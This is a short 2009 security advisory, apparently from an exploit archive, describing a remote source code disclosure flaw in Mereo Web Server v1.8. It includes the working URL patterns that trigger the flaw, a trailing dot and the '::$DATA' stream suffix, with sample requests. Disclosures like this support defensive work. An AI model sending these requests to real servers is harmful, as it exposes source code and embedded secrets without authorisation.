Mereo web server 1.8 remote source code disclosure

2009.09.26

Credit: Dr_IDE

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
#################################################################################
- Description -
Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available.
Mereo is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][.]
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/index.html.
http://172.16.2.101/index.html::$DATA

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mereo web server 1.8 remote source code disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.